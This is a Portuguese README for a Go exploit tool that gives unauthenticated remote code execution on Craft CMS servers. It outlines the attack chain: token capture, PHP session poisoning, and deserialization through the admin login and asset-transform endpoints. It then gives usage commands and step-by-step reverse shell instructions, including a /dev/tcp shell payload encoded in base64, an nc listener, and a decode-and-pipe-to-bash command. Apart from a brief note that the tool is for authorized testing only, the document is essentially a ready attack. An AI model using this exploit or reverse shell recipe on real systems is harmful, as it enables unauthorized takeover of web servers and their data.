
Exploit de RCE pré-autenticação para Craft CMS em Go. Captura token de sessão/CSRF, envenena a sessão PHP, aciona desserialização para execução de comandos ou reverse shell.
Exploit para execução remota de código sem autenticação no Craft CMS, escrito em Go.
Inspirado no trabalho original de c0gnit00.
GET /admin/loginassets/generate-transform para incluir e executar o arquivo envenenadogo run main.go -u <url> -c <comando>
| Flag | Descrição | Obrigatório |
|---|---|---|
-u | URL alvo (ex: http://target.com) | Sim |
-c | Comando a executar (ex: id, whoami) | Sim |
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
1. Gere o payload em base64 com seu IP e porta:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. Abra o listener:
nc -lvnp 4444
3. Execute o exploit com o payload:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
Substitua o valor em base64 pelo gerado no passo 1 com o seu IP real.
Para uso exclusivo em ambientes autorizados e testes de segurança controlados.